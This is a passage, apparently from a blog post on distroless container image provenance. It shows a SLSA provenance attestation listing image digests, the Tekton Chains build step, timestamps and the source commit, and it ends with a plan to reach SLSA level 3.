        "sha256": "deb41661be772c6256194eb1df6b526cc95a6f60e5f5b740dda2769b20778c51"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs",

      "digest": {

        "sha256": "927dd07e7373e1883469c95f4ecb31fe63c3acd104aac1655e15cfa9ae0899bf"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs",

      "digest": {

        "sha256": "927dd07e7373e1883469c95f4ecb31fe63c3acd104aac1655e15cfa9ae0899bf"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs",

      "digest": {

        "sha256": "f106757268ab4e650b032e78df0372a35914ed346c219359b58b3d863ad9fb58"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs-debian10",

      "digest": {

        "sha256": "927dd07e7373e1883469c95f4ecb31fe63c3acd104aac1655e15cfa9ae0899bf"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs-debian10",

      "digest": {

        "sha256": "f106757268ab4e650b032e78df0372a35914ed346c219359b58b3d863ad9fb58"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs-debian10",

      "digest": {

        "sha256": "927dd07e7373e1883469c95f4ecb31fe63c3acd104aac1655e15cfa9ae0899bf"

      }

    },

    {

      "name": "gcr.io/distroless/python3",

      "digest": {

        "sha256": "aa8a0358b2813e8b48a54c7504316c7dcea59d6ae50daa0228847de852c83878"

      }

    },

    {

      "name": "gcr.io/distroless/python3-debian10",

      "digest": {

        "sha256": "aa8a0358b2813e8b48a54c7504316c7dcea59d6ae50daa0228847de852c83878"

      }

    },

    {

      "name": "gcr.io/distroless/static",

      "digest": {

        "sha256": "9acfd1fdf62b26cbd4f3c31422cf1edf3b7b01a9ecee00a499ef8b7e3536914d"

      }

    },

    {

      "name": "gcr.io/distroless/static",

      "digest": {

        "sha256": "e50641dbb871f78831f9aa7ffa59ec8f44d4cc33ae4ee992c9f4b046040e97f2"

      }

    },

    {

      "name": "gcr.io/distroless/static-debian10",

      "digest": {

        "sha256": "9acfd1fdf62b26cbd4f3c31422cf1edf3b7b01a9ecee00a499ef8b7e3536914d"

      }

    },

    {

      "name": "gcr.io/distroless/static-debian10",

      "digest": {

        "sha256": "e50641dbb871f78831f9aa7ffa59ec8f44d4cc33ae4ee992c9f4b046040e97f2"

      }

    }

  ],

  "predicate": {

    "invocation": {

      "parameters": [

        "MANIFEST_SUBSECTION={string 0 []}",

        "CHAINS-GIT_COMMIT={string 976c1c9bc178ac0371d8888d69893145c3df09f0 []}",

        "CHAINS-GIT_URL={string https://github.com/GoogleContainerTools/distroless []}"

      ],

      "recipe_uri": "task://distroless-provenance",

      "event_id": "531c282f-806e-41e4-b3ad-b596c4283381",

      "builder.id": "tekton-chains"

    },

    "recipe": {

      "steps": [

        {

          "entryPoint": "#!/bin/sh\nset -ex\n\n# get the digests for a subset of images built, and store in the IMAGES result\ngo run provenance/provenance.go images $(params.MANIFEST_SUBSECTION) > $(results.IMAGES.path)\n",

          "arguments": null,

          "environment": {

            "container": "provenance",

            "image": "docker.io/library/[email protected]:cb1a7482cb5cfc52527c5cdea5159419292360087d5249e3fe5472f3477be642"

          },

          "annotations": null

        }

      ]

    },

    "metadata": {

      "buildStartedOn": "2021-09-16T00:03:04Z",

      "buildFinishedOn": "2021-09-16T00:04:36Z"

    },

    "materials": [

      {

        "uri": "https://github.com/GoogleContainerTools/distroless",

        "digest": {

          "revision": "976c1c9bc178ac0371d8888d69893145c3df09f0"

        }

      }

    ]

  }

}



As you might guess, our next step is getting distroless to SLSA 3, which will require adding non-falsifiable provenance and isolated builds to the distroless supply chain. Stay tuned for more!
